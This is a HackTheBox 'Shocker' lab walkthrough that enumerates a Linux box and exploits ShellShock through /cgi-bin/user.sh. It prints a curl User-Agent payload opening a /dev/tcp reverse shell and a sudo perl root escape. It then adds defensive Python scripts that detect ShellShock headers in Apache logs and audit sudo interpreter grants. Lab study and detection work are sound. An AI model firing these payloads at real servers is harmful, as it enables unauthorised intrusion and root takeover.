
From Wiki Aghanim
Shocker
Platform: HackTheBox
OS: Linux
Difficulty: Easy
Techniques: ShellShock


This is rated an easy box, and for good reason. However, I spent a good amount of time just enumerating because the initial access was hidden well. For anyone who has encountered this vulnerability before, it would be a piece of cake, but I had never come across ShellShock before, so I spent a lot of time enumerating. Rooting this box was as simple as one command.




Enumeration

I'll start off with an nmap scan to get an idea of what's running on the machine.


└─# nmap -sC -sV 10.10.10.56 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 16:45 EST
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds


Only two ports, 80 and 2222. OpenSSH is running on an uncommon port. That, however, leads nowhere, so it will be ignored in the remainder of this writeup.


Visiting the webserver we are welcomed by this page: a very simple page with not much content.




Don't Bug Me!


Using gobuster to find hidden directories.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 14:31:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]

===============================================================
2022/01/12 14:31:52 Finished
===============================================================


Nothing noteworthy. After a lot of enumeration I started looking at /cgi-bin/. After some googling I found this.


> ShellShock

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received. https://book.hacktricks.xyz/pentesting/pentesting-web/cgi


> How Does ShellShock Work?

In layman’s terms, Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system. https://securityintelligence.com/articles/shellshock-vulnerability-in-depth/


So after reading this I edited my gobuster dir search and found a file, user.sh.


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,jpg,txt,html,php -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi,sh,jpg,txt,html,php
[+] Timeout:                 10s
===============================================================
2022/01/12 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 118]

===============================================================
2022/01/12 14:47:05 Finished
===============================================================


Reading the file:


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# cat user.sh
Content-Type: text/plain

Just an uptime test script

 14:07:18 up 21:24,  0 users,  load average: 0.19, 0.09, 0.03


Initial Access

As mentioned earlier, the server is vulnerable to ShellShock, a vulnerability in Bash that lets us execute arbitrary commands through the CGI script and gain a remote shell on the machine.


curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.17/4444 0>&1' http://10.10.10.56/cgi-bin/


┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.56] 42834
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$ pwd
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$
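The quoted ShellShock description above says the bug is in how Bash handles environment variables, and the request above shows how a web server hands a header value to Bash through mod_cgi. From the defender's side, the same property makes the attack easy to spot in access logs: a Bash exported function always starts with `() {`, and no legitimate User-Agent or Referer does. The following Python script is an added example, not part of the original write-up or of any tool it uses. It parses Apache combined-format log lines, flags any header field that carries the `() {` prefix, and records whether the request hit /cgi-bin/ (where the header actually reaches a script's environment). The LOG_LINES are constructed; the addresses reuse the ones in the write-up and the timestamps are invented.

```python
"""Scan Apache access-log lines for ShellShock-shaped header values.

Added example for this write-up, not part of the original page or of any tool
it uses. The LOG_LINES below are constructed in Apache's "combined" format;
the addresses reuse the ones in the write-up, the timestamps are invented.
"""
import re

# Apache combined log format:
#   ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Bash exported functions start with "() {". No legitimate HTTP header value
# starts that way, so the prefix alone is a high-confidence indicator; the
# vulnerability was that Bash kept parsing what followed the closing brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Log fields that end up in a CGI script's environment: User-Agent and Referer
# as HTTP_* variables, the request line as REQUEST_URI / QUERY_STRING.
HEADER_FIELDS = ("agent", "referer", "request")

# Constructed sample log (not real traffic).
LOG_LINES = [
    '10.10.14.17 - - [12/Jan/2022:14:31:38 -0500] "GET /index.html HTTP/1.1" 200 137 "-" "gobuster/3.1.0"',
    '10.10.14.17 - - [12/Jan/2022:14:47:05 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
    '10.10.14.17 - - [12/Jan/2022:15:02:11 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; echo probe"',
    '10.10.14.17 - - [12/Jan/2022:15:03:40 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "() { :;}; echo probe" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the combined-format fields as a dict, or None if the line does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_value(value):
    """True if a header value carries the Bash function-export prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_log(lines):
    """Return one finding per line whose header fields look like a ShellShock payload."""
    findings = []
    for number, line in enumerate(lines, start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        hit_fields = [f for f in HEADER_FIELDS if is_shellshock_value(rec[f])]
        if not hit_fields:
            continue
        findings.append({
            "line": number,
            "ip": rec["ip"],
            "request": rec["request"],
            "status": rec["status"],
            "fields": hit_fields,
            # A CGI target means the header value really reached Bash's environment.
            "cgi_target": "/cgi-bin/" in rec["request"],
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        print(f"line {f['line']}: {f['ip']} {f['request']} [{f['status']}] "
              f"payload in {','.join(f['fields'])} cgi_target={f['cgi_target']}")
```

Run against a real log with `scan_log(open("/var/log/apache2/access.log").read().splitlines())`; the status code is kept in each finding because a 200 on a CGI target is the case worth treating as a likely successful execution rather than a blocked probe.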


Root

Getting root on this was extremely easy. After doing the usual enumeration I found that the user shelly could run perl as root via sudo.


shelly@Shocker:/$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
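The root step above comes down to one sudoers rule: an interpreter granted to root without a password is the same as granting a root shell, because any interpreter can exec another program. As an added example, not part of the original write-up, the following Python script parses `sudo -l` output of the shape shown above and flags rules that hand out ALL or an interpreter, rating root plus NOPASSWD highest. SUDO_L_OUTPUT is constructed to mirror the listing above with one harmless extra rule added for contrast, and INTERPRETERS is an assumed, non-exhaustive list.

```python
"""Audit `sudo -l` output for rules that hand an interpreter to root.

Added example for this write-up, not part of the original page. SUDO_L_OUTPUT
is constructed to mirror the listing above, with one harmless extra rule added
for contrast; INTERPRETERS is an assumed, non-exhaustive list of binaries that
can run arbitrary code (and so start a shell) once launched.
"""
import re

INTERPRETERS = {
    "perl", "python", "python2", "python3", "ruby", "php", "node", "lua",
    "sh", "bash", "dash", "zsh",
}

# One sudo rule line, e.g. "(root) NOPASSWD: /usr/bin/perl" or "(ALL : ALL) ALL".
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*?)\s*$'
)

# Constructed sample (raw string so the escaped colons in secure_path survive).
SUDO_L_OUTPUT = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/uptime
"""


def parse_sudo_l(text):
    """Return the rules listed after the 'may run the following commands' line."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        # "(ALL : ALL)" carries a run-as group after the colon; keep the user part.
        runas_user = m.group("runas").split(":")[0].strip()
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        commands = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": runas_user, "tags": tags, "commands": commands})
    return rules


def audit_rules(rules):
    """Flag rules whose command is ALL or an interpreter; rate root+NOPASSWD as high."""
    findings = []
    for rule in rules:
        as_root = rule["runas"] in ("root", "ALL")
        for command in rule["commands"]:
            executable = command.split()[0]
            name = executable.rsplit("/", 1)[-1]
            if command == "ALL":
                reason = "any command allowed"
            elif name in INTERPRETERS:
                reason = f"{name} can execute arbitrary code, which is equivalent to a shell"
            else:
                continue
            severity = "high" if as_root and "NOPASSWD" in rule["tags"] else "medium"
            findings.append({"command": command, "runas": rule["runas"],
                             "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"[{finding['severity']}] ({finding['runas']}) "
              f"{finding['command']}: {finding['reason']}")
```

The audit keys on the basename of the first word of each command, so an argument-restricted rule such as `/usr/bin/perl /opt/report.pl` is still flagged: argument restrictions do not help when the interpreter itself decides what to run. The fix on the defender's side is to replace interpreter grants with a rule for the specific wrapper script, or to require a password at minimum.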